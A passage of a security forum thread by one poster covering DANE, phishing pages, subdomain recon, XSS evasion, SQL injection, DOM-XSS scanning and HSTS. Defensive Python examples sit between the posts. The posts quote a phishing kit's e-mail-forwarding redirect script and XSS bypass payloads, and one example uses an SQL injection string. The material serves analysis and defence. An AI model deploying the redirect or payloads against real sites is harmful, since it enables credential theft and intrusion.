Author Topic: Tests and other Media topics  (Read 296274 times)


Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 32620
  • malware fighter
Re: Tests and other Media topics
« Reply #810 on: July 10, 2020, 01:25:02 PM »
Mozilla now shortens lifespan of TLS certificates also to enhance https security.
A better way to do this is to use DANE for web:
Read: https://cs.gmu.edu/~eoster/doc/2015-08-US-Telecom-DANE.pdf

Check with DANE SMTP Validator (random example): https://dane.sys4.de/smtp/security.nl
or through https://www.huque.com/bin/danecheck  or  https://check.sidnlabs.nl/dane/

polonus
« Last Edit: July 10, 2020, 11:10:21 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!
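
The DANE check the validators above perform, as an added example (not code from the post or from any of the linked services): a TLSA record is parsed from its presentation format, the association data is derived from the presented certificate, and the two are compared. The certificate and SubjectPublicKeyInfo bytes are constructed placeholders; in practice they are the DER encodings taken from the TLS handshake, and the TLSA lookup must itself be DNSSEC-validated.

```python
import hashlib
import hmac
from dataclasses import dataclass

# Constructed sample inputs for this example only: in reality these are the
# DER encoding of the server certificate and of its SubjectPublicKeyInfo.
SAMPLE_CERT_DER = b"constructed-certificate-DER-bytes-for-example"
SAMPLE_SPKI_DER = b"constructed-SubjectPublicKeyInfo-DER-bytes"


@dataclass(frozen=True)
class TLSARecord:
    usage: int      # 0 PKIX-TA, 1 PKIX-EE, 2 DANE-TA, 3 DANE-EE (RFC 6698)
    selector: int   # 0 full certificate, 1 SubjectPublicKeyInfo
    mtype: int      # 0 exact match, 1 SHA-256, 2 SHA-512
    data: bytes     # certificate association data


def parse_tlsa(rdata: str) -> TLSARecord:
    """Parse TLSA rdata in presentation format: 'usage selector mtype hex...'."""
    parts = rdata.split()
    if len(parts) < 4:
        raise ValueError("TLSA rdata needs usage, selector, matching type and data")
    usage, selector, mtype = (int(p) for p in parts[:3])
    for name, value, limit in (("usage", usage, 3), ("selector", selector, 1),
                               ("matching type", mtype, 2)):
        if not 0 <= value <= limit:
            raise ValueError(f"TLSA {name} out of range: {value}")
    # The hex data may be split over several whitespace-separated chunks.
    return TLSARecord(usage, selector, mtype, bytes.fromhex("".join(parts[3:])))


def association_data(selector: int, mtype: int, cert_der: bytes, spki_der: bytes) -> bytes:
    """Derive what the record's data field must contain for this certificate."""
    selected = cert_der if selector == 0 else spki_der
    if mtype == 0:
        return selected
    if mtype == 1:
        return hashlib.sha256(selected).digest()
    return hashlib.sha512(selected).digest()


def tlsa_matches(record: TLSARecord, cert_der: bytes, spki_der: bytes) -> bool:
    """True when the presented certificate matches the published TLSA record.

    For usages 0 and 1 the certificate must additionally pass normal PKIX
    chain validation; this function only checks the association data.
    """
    expected = association_data(record.selector, record.mtype, cert_der, spki_der)
    return hmac.compare_digest(expected, record.data)


def make_tlsa_rdata(usage: int, selector: int, mtype: int,
                    cert_der: bytes, spki_der: bytes) -> str:
    """Build the rdata a zone owner publishes for its own certificate."""
    data = association_data(selector, mtype, cert_der, spki_der)
    return f"{usage} {selector} {mtype} {data.hex()}"


if __name__ == "__main__":
    rdata = make_tlsa_rdata(3, 1, 1, SAMPLE_CERT_DER, SAMPLE_SPKI_DER)
    print("_443._tcp.example.com. IN TLSA", rdata)
    print("matches:", tlsa_matches(parse_tlsa(rdata), SAMPLE_CERT_DER, SAMPLE_SPKI_DER))
```

The "3 1 1" form (DANE-EE, SPKI, SHA-256) is the usual choice because the record survives certificate renewal as long as the key pair is kept; a rotated key that is not republished in DNS is exactly the failure the validators flag.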

Offline polonus

Re: Tests and other Media topics
« Reply #811 on: July 12, 2020, 06:11:59 PM »
Privacy error on page. Non-trusted certificate, F-grade; see the full report here:
https://www.ssllabs.com/ssltest/analyze.html?&hideResults=on&d=myavcs.com
opening up to -https://www.disasterrecoverycenter.org, also NON-TRUSTED and expired!
This website has a T-grade, which is even worse. Advanced iFrame functions there.

You can report similar UNTRUSTED websites through the suspicious site reporter extension in the browser.

Here we can read about exploitable PHP functions and how they have been troubling us for the last thirty years and more:
https://stackoverflow.com/questions/3115559/exploitable-php-functions
and another discussion here on appsec:
https://security.stackexchange.com/questions/1382/disable-insecure-dangerous-php-functions

pol

« Last Edit: July 13, 2020, 12:14:48 AM by polonus »

Offline polonus

Re: Tests and other Media topics
« Reply #812 on: July 21, 2020, 03:25:01 PM »
Testing for PHP on a particular PHISHING page where we know it has Endurance Page Cache PHP translation to HTML, as a scan for Endurance Page Cache HTML may help to reveal it in the code (regular-expression mail code etc.);
example: checking on -https://cndherbals.com/endurance-page-cache.html
Quote
<script type="text/javascript">
// Phishing-kit logic as found on the page: the URL fragment (the part after
// "#") is checked for an e-mail shape and, if it passes, the visitor is sent
// on to the harvesting page with that address prefilled (URL defanged with "-").
function validateEmail(email) {
    var re = /^(([^<>()[\]\.,;:\s@\"]+(\.[^<>()[\]\.,;:\s@\"]+)*)|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;
    return re.test(email);
}
var hash = window.location.hash.substring(1);
if (validateEmail(hash)) {
    window.location = "-https://www.yuxuans.cn/wp-admin/network/dooo/quota/?email=" + hash;
}
</script>
It also uses MonsterInsights for Google Analytics.

polonus
« Last Edit: July 21, 2020, 03:28:50 PM by polonus »

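A way to spot the pattern quoted in the post above when scanning page source, added here as an example and not part of the post or of any scanner it mentions: the script reads the URL fragment, validates it with an e-mail regex, and assigns location to a string literal on another host concatenated with that fragment. The sample page, the host names and the pattern names are constructed for this example.

```python
import re
from urllib.parse import urlparse

# Constructed sample page modelled on the quoted kit: the fragment (#...) is
# checked for an e-mail shape and then forwarded, prefilled, to another host.
SAMPLE_PAGE = """<html><body>
<script type="text/javascript">
function validateEmail(email) {
  var re = /^[^\\s@]+@[^\\s@]+\\.[a-zA-Z]{2,}$/;
  return re.test(email);
}
var hash = window.location.hash.substring(1);
if (validateEmail(hash)) {
  window.location = "https://phish-destination.example/login/?email=" + hash;
}
</script>
<script>console.log("unrelated");</script>
</body></html>"""

SCRIPT_BLOCK = re.compile(r"<script[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
READS_HASH = re.compile(r"(?:window\.|document\.)?location\.hash")
# a regex literal anchored with ^...$ that contains an "@": the e-mail validator
EMAIL_REGEX_LITERAL = re.compile(r"/\^[^/\n]*@[^/\n]*\$/")
# location assignment whose value is a string literal concatenated with data
REDIRECT_CONCAT = re.compile(
    r"(?:window\.|document\.|top\.)?location(?:\.href)?\s*=\s*['\"]([^'\"]+)['\"]\s*\+")


def analyse_script(js: str, page_host: str) -> dict:
    """Classify one inline script; page_host is the host serving the page."""
    targets = [urlparse(u).hostname for u in REDIRECT_CONCAT.findall(js)]
    offsite = [h for h in targets if h and h.lower() != page_host.lower()]
    finding = {
        "reads_hash": bool(READS_HASH.search(js)),
        "validates_email": bool(EMAIL_REGEX_LITERAL.search(js)),
        "offsite_targets": offsite,
    }
    if finding["reads_hash"] and finding["validates_email"] and offsite:
        finding["verdict"] = "prefilled-email phishing redirect"
    elif finding["reads_hash"] and offsite:
        finding["verdict"] = "fragment-driven offsite redirect"
    else:
        finding["verdict"] = "no redirect pattern"
    return finding


def scan_page(html: str, page_host: str) -> list:
    """Return one finding per inline script that shows a redirect pattern."""
    findings = []
    for body in SCRIPT_BLOCK.findall(html):
        f = analyse_script(body, page_host)
        if f["verdict"] != "no redirect pattern":
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in scan_page(SAMPLE_PAGE, "victim-site.example"):
        print(f["verdict"], "->", f["offsite_targets"])
```

The fragment is never sent to the server, which is why server-side logs of the landing page show nothing unusual; the detection has to run on the delivered HTML, as above, or in the browser.
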
Offline polonus

Re: Tests and other Media topics
« Reply #813 on: July 22, 2020, 01:12:03 PM »
Domain names and subdomain enumeration... DNS and WHOIS protocol methods are used.
Re: https://dnsspy.io/scan
Also for sub-domains: https://securitytrails.com/blog/subdomain-scanner-find-subdomains.

Automatically generated at places where you could register.
Via the zone owner; authorities here are very restrictive because of risks.
Through DNS queries (for example Cisco Umbrella (OpenDNS)).
Via Certificate Transparency: https://crt.sh/.
Through scans at Shodan & Censys etc.
Through multi-threaded scripts: clone DNS root directories to see what is still available (free).
But these are rate-limited against obvious abuse.

Google is your best friend: Google for site:example.com; this delivers info on subsites. Just try for instance site:wordpress.com or site:moonfruit.com. The latter has many a phishing site (e.g. with site:moonfruit.com owa).
Such queries could be combined with Google dorks, e.g. for specific WordPress versions and/or used themes/plugins.
Info credits go to: Erik van Straten.

Look at resources like: RobTex.com

https://pentest-tools.com/information-gathering/find-subdomains-of-domain#

Also try:  https://www.ultratools.com/

There are many (semi-)public DNS servers that gather data on DNS lookups.
Such data is being used to look up sub-domains and hostnames per IP.
Resources can be public or on demand.
Whenever you use a "secret" hostname one should check what DNS servers will get your requests.
Do not use public name servers and/or on clients.

Then we have AXFR unrestricted, open to offenders, to get to all of the zone.
This should be limited to trusted name servers. Check all name servers of that particular domain.
Has a zone file been entered online?

dig ANY. The DNS server for that domain has all known domains in cache.

An open root directory on a web server can also lead to disclosure.

Also a DNS server or interface of control panel (etc.) could be hacked.

Also look for test-servers. Often these are not being maintained.

The plugin update check for WordPress is spurious; it cannot be trusted fully.
Using backup plugins, check that plug-ins are not available online.
Remove disabled plugins and all remaining files. (info credits: anonymous resources)

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)



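The Certificate Transparency route from the list above, worked as an added example from the defender's side (not code from the post or from crt.sh): the JSON that crt.sh returns for a "%.example.com" query is reduced to an inventory of hostnames under the apex, wildcards and look-alike names are set aside, and the result is compared with the hosts you know about, which is how forgotten test servers surface. The entries are constructed; the field names (name_value, common_name, issuer_name, not_before) are assumed to mirror the crt.sh JSON output.

```python
import json
from dataclasses import dataclass, field

# Constructed sample in the shape of https://crt.sh/?q=%25.example.com&output=json
# (field names assumed from that API; the entries themselves are invented).
SAMPLE_CT_JSON = json.dumps([
    {"id": 1, "issuer_name": "C=US, O=Example CA", "common_name": "example.com",
     "name_value": "example.com\nwww.example.com", "not_before": "2020-01-01T00:00:00"},
    {"id": 2, "issuer_name": "C=US, O=Example CA", "common_name": "*.example.com",
     "name_value": "*.example.com", "not_before": "2020-03-01T00:00:00"},
    {"id": 3, "issuer_name": "C=US, O=Example CA", "common_name": "test-old.example.com",
     "name_value": "TEST-OLD.example.com\nstaging.example.com",
     "not_before": "2019-06-01T00:00:00"},
    {"id": 4, "issuer_name": "C=US, O=Example CA", "common_name": "example.com.evil.test",
     "name_value": "example.com.evil.test", "not_before": "2020-05-01T00:00:00"},
])


@dataclass
class CTInventory:
    hosts: set = field(default_factory=set)       # concrete names under the apex
    wildcards: set = field(default_factory=set)   # *.apex style names
    foreign: set = field(default_factory=set)     # names not under the apex at all


def in_zone(name: str, apex: str) -> bool:
    return name == apex or name.endswith("." + apex)


def subdomains_from_ct(ct_json: str, apex: str) -> CTInventory:
    """Collect every SAN and CN from the CT results, normalised to lower case."""
    inv = CTInventory()
    apex = apex.lower().rstrip(".")
    for entry in json.loads(ct_json):
        names = set(entry.get("name_value", "").split("\n")) | {entry.get("common_name", "")}
        for raw in names:
            name = raw.strip().lower().rstrip(".")
            if not name:
                continue
            if not in_zone(name, apex):
                inv.foreign.add(name)   # substring match only, e.g. a look-alike domain
            elif name.startswith("*."):
                inv.wildcards.add(name)
            else:
                inv.hosts.add(name)
    return inv


def unknown_hosts(inv: CTInventory, known: set) -> set:
    """Hosts with public certificates that are missing from your own inventory."""
    known_lower = {k.lower() for k in known}
    return {h for h in inv.hosts if h not in known_lower}


if __name__ == "__main__":
    inventory = subdomains_from_ct(SAMPLE_CT_JSON, "example.com")
    print("hosts:", sorted(inventory.hosts))
    print("unknown:", unknown_hosts(inventory, {"example.com", "www.example.com"}))
```

Wildcard certificates hide individual hostnames from CT, so an empty "unknown" set from this check is not proof that no forgotten hosts exist; it only covers names that were issued certificates individually.
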
Offline polonus

Re: Tests and other Media topics
« Reply #814 on: July 24, 2020, 12:35:53 PM »
What to do when we have a domain like: -http://ww12.d-analyse.com/  for instance?
This is parking logic: a parking-crew monetizing website.

Hosted at, see: https://www.shodan.io/host/54.72.9.115
on -ec2-54-72-9-115.eu-west-1.compute.amazonaws.com

Is this website a legit website? This because the domain format is not a valid one, e.g. ww12. etc.
Can we say this is a form of cert. abuse?

Parking monetizers (in the cloud) can so avoid detection.

Somewhat higher up in that hosting domain we find:
https://dnsspy.io/scan/eu-west-1.compute.amazonaws.com  (info credits go to: luntrus)

polonus

Offline polonus

Re: Tests and other Media topics
« Reply #815 on: August 07, 2020, 09:37:44 PM »
XSS Filters: a cure against DOM-XSS exploits.
Example code
Quote
// test harness: loads mocha, expect.js, the filter library and its unit tests
require("mocha");
expect = require('expect.js');
xssFilters = require('../src/XSS-filters');
testutils = require('./utils.js');
require('./unit/private-xss.filters.js');
require('./unit/xss.filters.js');
Source: Yahoo archives.
- See the owasp.org XSS Filter Evasion Cheat Sheet.

polonus

Offline polonus

Re: Tests and other Media topics
« Reply #816 on: August 08, 2020, 09:20:17 PM »
But nothing comes guaranteed in webcode development and with script security,
so one can even evade such XSS Filters:
https://owasp.org/www-community/xss-filter-evasion-cheatsheet

Already convinced this will be an ongoing battle i.m.h.o.

For instance, abuse scans worked with issues from an XSS Bypass Filter list,
for instance adding: <script/src=data:,alert()> or e.g. %3Cscript/src=data:,alert(retire.js)%3E
(only for legit pentesters that were granted exclusive written permission from the owner).

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
« Last Edit: August 09, 2020, 09:48:13 PM by polonus »

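What a filter library such as the one in the two posts above actually does, and why the evasion list keeps winning against blacklists, as an added example that is not code from the posts, from Yahoo's library or from OWASP: output is encoded for the context it lands in (HTML text, quoted attribute), and for href/src the scheme is allow-listed rather than filtered, since encoding cannot make "data:" or "javascript:" harmless in a URL attribute. The payload from the post is run through it. Function names and the allowed-scheme list are choices made for this example.

```python
import re

# Characters that must be encoded when untrusted text lands in HTML text or
# in a quoted attribute value (the OWASP "encode for the context" rules).
_HTML_TEXT = {"&": "&amp;", "<": "&lt;", ">": "&gt;"}
_HTML_ATTR = {**_HTML_TEXT, '"': "&quot;", "'": "&#x27;"}
_SCHEME = re.compile(r"^([a-zA-Z][a-zA-Z0-9+.\-]*):")
ALLOWED_SCHEMES = ("http", "https")   # assumption for this example


def encode_html_text(s: str) -> str:
    """Encode for an HTML element body (between tags)."""
    return "".join(_HTML_TEXT.get(c, c) for c in s)


def encode_html_attr(s: str) -> str:
    """Encode for a double- or single-quoted attribute value."""
    return "".join(_HTML_ATTR.get(c, c) for c in s)


def safe_url(u: str):
    """Return u if it is relative or http(s), else None.

    Encoding alone does not help for href/src: 'javascript:' and 'data:'
    are valid attribute values, so the scheme has to be allow-listed.
    Control characters and whitespace are stripped first because browsers
    ignore them inside a scheme ("java\\tscript:" still runs).
    """
    cleaned = re.sub(r"[\x00-\x20\x7f]", "", u)
    m = _SCHEME.match(cleaned)
    if m and m.group(1).lower() not in ALLOWED_SCHEMES:
        return None
    return cleaned


def render_link(href: str, label: str) -> str:
    """Build an <a> tag from an untrusted href and label, each encoded for its context."""
    url = safe_url(href)
    if url is None:
        url = "#"
    return f'<a href="{encode_html_attr(url)}">{encode_html_text(label)}</a>'


def render_search_echo(query: str) -> str:
    """Echo a query parameter back into the page body (text context)."""
    return f"<p>Results for: {encode_html_text(query)}</p>"


if __name__ == "__main__":
    print(render_search_echo("<script/src=data:,alert()>"))
    print(render_link("data:,alert()", "click"))
```

The point of the evasion cheat sheet is that a blacklist has to anticipate every tokenisation trick; the encoder has no list at all, it simply never emits a character that can change the parsing context, which is why the payload stays inert regardless of how it is spelled.
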
Offline polonus

Re: Tests and other Media topics
« Reply #817 on: August 09, 2020, 11:10:11 AM »
L.S.

No more SQL injections with WASPlang?

* SQL injections are to be avoided by using prepared statements with parameters.
Sanitizing is felt to be for dummies.
However, consider the following (for what it is worth ;)).

Little footprint; the assembly line makes it harder for XSS attacks and SQL injection to succeed,
but only when the code is neatly sanitized *

Features

encourages immutability
immutable c-strings, memory manipulation, global variables, imported functions, 1st class functions
optional standard library runtime
functions with inline web assembly
test framework support
easy project dependency management
self hosting

Source: https://github.com/wasplang/wasp

Simplified parser code for configuring WSON (like JSON but then for WASPlang),
see: https://github.com/wasp-lang/wasp/issues/18

Also read: https://github.com/renjithgr/starred-repos & for sanitizing:
https://drupal.stackexchange.com/questions/1967/what-does-sanitized-mean-in-api-documentation

And to make this circle discussion go round again:
https://api.drupal.org/api/drupal/includes%21common.inc/function/filter_xss/7.x (see warnings there).

Info credits dehondgaatlatijddeaud & #sockpuppet & luntrus

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
« Last Edit: August 09, 2020, 12:20:43 PM by polonus »

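The asterisked point above (prepared statements with parameters, sanitizing as a fallback) in runnable form, as an added example that is not from the post or from the WASP project: the same lookup is written three ways against an in-memory SQLite table, once with string splicing, once with quote-escaping "sanitizing" in a numeric context where it does nothing, and once with bound parameters. The table and its rows are constructed.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table for the example; no real data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
    conn.executemany("INSERT INTO users (name, role) VALUES (?, ?)",
                     [("alice", "admin"), ("bob", "user"), ("carol", "user")])
    return conn


def find_user_unsafe(conn, name: str) -> list:
    """Vulnerable: untrusted input is spliced into the SQL text."""
    query = "SELECT name, role FROM users WHERE name = '" + name + "'"
    return conn.execute(query).fetchall()


def find_user_safe(conn, name: str) -> list:
    """Parameterised: the driver passes the value separately from the SQL text."""
    return conn.execute("SELECT name, role FROM users WHERE name = ?", (name,)).fetchall()


def find_by_id_sanitized(conn, user_id: str) -> list:
    """'Sanitizing' by doubling quotes: useless here, the value is never quoted."""
    cleaned = user_id.replace("'", "''")
    return conn.execute("SELECT name, role FROM users WHERE id = " + cleaned).fetchall()


def find_by_id_safe(conn, user_id: str) -> list:
    """Validate the type, then bind; a non-numeric id is rejected outright."""
    return conn.execute("SELECT name, role FROM users WHERE id = ?",
                        (int(user_id),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("unsafe:", find_user_unsafe(db, "' OR '1'='1"))
    print("safe:  ", find_user_safe(db, "' OR '1'='1"))
```

The second pair is the one the "sanitizing is for dummies" remark is about: escaping characters is context dependent, while a bound parameter is typed data the SQL parser never sees as syntax.
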
Offline polonus

Re: Tests and other Media topics
« Reply #818 on: August 10, 2020, 10:28:15 AM »
DOM-XSS exploits are just part of the story.
Pentesters and researchers work preferably from combined sec lists like:
https://github.com/danielmiessler/SecLists

So for instance analyse XSS-DOM sinks and sources -> https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html
with weaknesses (medium and low vulnerabilities) through retirable jQuery libraries:

Many developers use  Retire.JS (developed by Erlend Oftedal), also found online as:
https://retire.insecurity.today/  (Retire.JS can also be used as extension inside the browser).

Know that some libraries have reached EOL quite some time ago, read:
https://github.com/jquery/jquery.com/issues/162#issuecomment-298656430

Only vulnerable in the case that certain functions are being called, so better to upgrade that particular library.

In that code there may be a weakness like s.iframe Src+,
but it could be src already before that has been validated properly.
(my info sources: luntrus & not me)

polonus

Offline polonus

Re: Tests and other Media topics
« Reply #819 on: August 10, 2020, 12:05:46 PM »
Why the above information urges us to scan for such exploitable website code?

Let's go over vulnerable jQuery code from a site that is launching Heodo malware and Emotet malcode:
https://urlhaus.abuse.ch/url/428165/

WordPress scan shows 5 security issues in the WordPress CMS.
Outdated plug-ins like header-footer-elementor 1.4.1 and elementor 2.9.7.
User enumeration not set to disabled. Directory listing /wp-content/uploads/ is left as: enabled.

Detected as vulnerable jQuery library to be retired, see: https://retire.insecurity.today/#!/scan/ac83b63cdec87cf9d917d6cb12995a5df8c57a639e8063305f2e5f6f76c546f8

Results from scanning URL: -https://earnquick.co.uk/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp
Number of sources found: 41
Number of sinks found: 17

Sources: .top  .innerHTML  [name=  location.  .top,  .opener  .name=  .name&  .name,  .parent(  .open( 
Sinks: value=  href= data (g.data)  .data  data=  .write(  value  src= 

Site not flagged by DShield    CLEAN
AlienVault OTX      CLEAN
Cisco Talos    CLEAN
abuse.ch (Feodo)    CLEAN
URLhaus    CLEAN
Spamhaus (Drop / eDrop)    CLEAN

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)

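The "sources found / sinks found" figures in the scan output above, and the source-and-sink analysis the previous post points to, come down to this kind of pass over script text. Added here as an example, not the scanner the post used and not code from OWASP: each line is matched against a list of DOM-XSS source and sink patterns, and a simple forward taint rule flags sinks that receive a variable derived from a source. The sample script, the pattern lists and the names are constructed for the example, and the taint rule deliberately over-approximates (any assignment from a tainted value taints its target).

```python
import re

# Constructed sample script; not code from any scanned site.
SAMPLE_JS = """\
var q = location.hash.substring(1);
var ref = document.referrer;
var greeting = "Hi " + q;
document.getElementById("out").innerHTML = greeting;
var node = document.createTextNode(ref);
document.body.appendChild(node);
document.write("<p>static banner</p>");
"""

# Attacker-controlled inputs (sources) and places that interpret markup or code (sinks).
SOURCES = [r"location\.hash", r"location\.search", r"location\.href", r"document\.URL",
           r"document\.referrer", r"window\.name", r"document\.cookie"]
SINKS = [r"\.innerHTML\s*=", r"\.outerHTML\s*=", r"document\.write(?:ln)?\(", r"\beval\(",
         r"\bsetTimeout\(\s*['\"]", r"\.src\s*=", r"(?:location|location\.href)\s*=[^=]",
         r"\.insertAdjacentHTML\("]
ASSIGN = re.compile(r"^\s*(?:var|let|const)?\s*([A-Za-z_$][\w$]*)\s*=(?!=)\s*(.*)$")
IDENT = re.compile(r"[A-Za-z_$][\w$]*")


def scan_dom_xss(js: str) -> dict:
    """Count sources and sinks per line and flag sinks fed by source-tainted variables."""
    tainted, sources, sinks, flows = set(), [], [], []
    for lineno, line in enumerate(js.splitlines(), 1):
        hit_src = [p for p in SOURCES if re.search(p, line)]
        hit_sink = [p for p in SINKS if re.search(p, line)]
        sources += [(lineno, p) for p in hit_src]
        sinks += [(lineno, p) for p in hit_sink]
        m = ASSIGN.match(line)
        rhs_vars = set(IDENT.findall(m.group(2))) if m else set()
        # forward taint: a variable assigned from a source, or from another
        # tainted variable, is itself treated as tainted (over-approximation)
        if m and (hit_src or rhs_vars & tainted):
            tainted.add(m.group(1))
        if hit_sink:
            used = set(IDENT.findall(line)) & tainted
            if used:
                flows.append((lineno, sorted(used)))
    return {"sources": sources, "sinks": sinks, "tainted": sorted(tainted), "flows": flows}


if __name__ == "__main__":
    result = scan_dom_xss(SAMPLE_JS)
    print("Number of sources found:", len(result["sources"]))
    print("Number of sinks found:", len(result["sinks"]))
    for lineno, names in result["flows"]:
        print(f"line {lineno}: sink receives tainted {names}")
```

A raw sink count, like the 17 in the scan above, is not a vulnerability count: only the flows list points at lines where a source actually reaches a sink, and even those need a manual look to see whether validation happens in between (the createTextNode line in the sample is such a safe use the heuristic cannot tell apart).
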
Offline polonus

Re: Tests and other Media topics
« Reply #820 on: August 11, 2020, 07:23:29 PM »
Check a website domain for hsts-preload inclusion: hstspreload.org

Site should be set to be in a certain ruleset, already available in the browser.
Re: https://trac.torproject.org/projects/tor/ticket/10424
Read -> http://www.thoughtcrime.org/software/sslstrip/

Why could this be important on Tor to avoid certain recent MITM attacks?
Re: https://scotthelme.co.uk/hsts-preload-test/

Read: https://medium.com/@nusenu/how-malicious-tor-relays-are-exploiting-users-in-2020-part-i-1097575c0cac

Tor will protect your identity not your data going over the exit node.

This hacker still seems to have owned 10% of existing exit nodes, hence mainly interested in bitcoin exit nodes.

We can assume his activities will not be taken lightly by fellow cybercrime colleagues.  :D

See that HTTPS Everywhere, even as it comes built-in with Tor, won't always protect the end-user against downgrading attacks.

polonus
« Last Edit: August 11, 2020, 08:06:35 PM by polonus »

Offline polonus

Re: Tests and other Media topics
« Reply #821 on: August 11, 2020, 10:17:41 PM »
The first person that spoke about such an SSL downgrading attack, like SSL stripping,
was a researcher by the name of Moxie Marlinspike.

There are three ways to perform such SSL stripping attack:
1. Using a Proxy Server;
2. Via ARP Spoofing;
3. Using an insecure Hotspot.

Also a 4th I found out: using a particular scan service (info credits: luntrus).
Example XSS-DOM scan: Results from scanning URL: -http://ad.nl
Number of sources found: 2
Number of sinks found: 421 (same results as with -https://ad.nl, random example)

Ways to protect against this are to enable HTTPS on the pages of your website and
implement an HSTS policy; as we discussed above, the browser then won't open a site
unless the site uses HTTPS.  (info credits: Comodo's SSL)

Mind that Mainland China now blocks HTTPS traffic using TLS 1.3 & ESNI (known as encrypted server name indication),
read: https://geneva.cs.umd.edu/posts/china-censors-esni/esni/  &   https://gfw.report/blog/gfw_esni_blocking/en/

To perform this test, go and visit: https://www.cloudflare.com/ssl/encrypted-sni/
and then click the orange button “Check My Browser”. A moment later you will see the results.

Chrome does not support ESNI yet at this moment. We can foresee it being rolled out like DoH,
as some schools would not like to see their filtering software stop functioning properly because of this.
So there are still some hooks, but different from interfering with Big Firewall surveillance measures,
as mentioned above.  ;)

Enjoy, my good friends, enjoy.

polonus
« Last Edit: August 11, 2020, 11:28:01 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!
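
The HSTS side of the two posts above (the preload check in the earlier post, the stripping defence in this one), as an added example that is not code from the posts, from hstspreload.org or from any browser: the Strict-Transport-Security header is parsed, the three preload-list requirements on the header are checked, and a small model shows why a preload entry or a cached policy is what closes the first-visit window that sslstrip depends on. The minimum max-age of one year is the published hstspreload.org requirement; the preload table and host names are constructed.

```python
PRELOAD_MIN_MAX_AGE = 31536000  # one year, the hstspreload.org minimum

# Constructed stand-in for the browser's built-in preload list:
# host -> whether its entry covers subdomains.
PRELOADED = {"example.com": True, "nosub.example": False}


def parse_hsts(header: str) -> dict:
    """Parse a Strict-Transport-Security value (RFC 6797: names case-insensitive,
    directives separated by ';', max-age may be quoted)."""
    directives = {}
    for part in header.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, value = part.partition("=")
        directives[name.strip().lower()] = value.strip().strip('"')
    return directives


def preload_problems(header: str) -> list:
    """Reasons the preload list would reject this header (empty = header is fine).

    The list also requires a valid certificate, an HTTP-to-HTTPS redirect and
    the header on the apex domain; those are outside what a header check sees.
    """
    d = parse_hsts(header)
    problems = []
    if "max-age" not in d or not d["max-age"].isdigit():
        problems.append("max-age directive missing or not a number")
    elif int(d["max-age"]) < PRELOAD_MIN_MAX_AGE:
        problems.append(f"max-age {d['max-age']} is below {PRELOAD_MIN_MAX_AGE} seconds")
    if "includesubdomains" not in d:
        problems.append("includeSubDomains directive missing")
    if "preload" not in d:
        problems.append("preload directive missing")
    return problems


def first_visit_protected(host: str, preloaded: dict, has_cached_hsts: bool) -> bool:
    """Will the browser refuse plain HTTP before it has ever seen an HTTPS response?

    Without a preload entry (own or from a parent with includeSubDomains) or a
    previously cached policy, the first request can go out over HTTP, and that
    is the request an SSL-stripping proxy rewrites.
    """
    labels = host.lower().split(".")
    for i in range(len(labels)):
        parent = ".".join(labels[i:])
        if parent in preloaded and (i == 0 or preloaded[parent]):
            return True
    return has_cached_hsts


if __name__ == "__main__":
    hdr = "max-age=31536000; includeSubDomains; preload"
    print(hdr, "->", preload_problems(hdr) or "preload-ready")
    print("www.example.com first visit protected:",
          first_visit_protected("www.example.com", PRELOADED, False))
```

Note that includeSubDomains is what makes the preload entry useful against stripping on hosts the attacker picks (an unlisted subdomain is otherwise an open door), which is also why the list requires it.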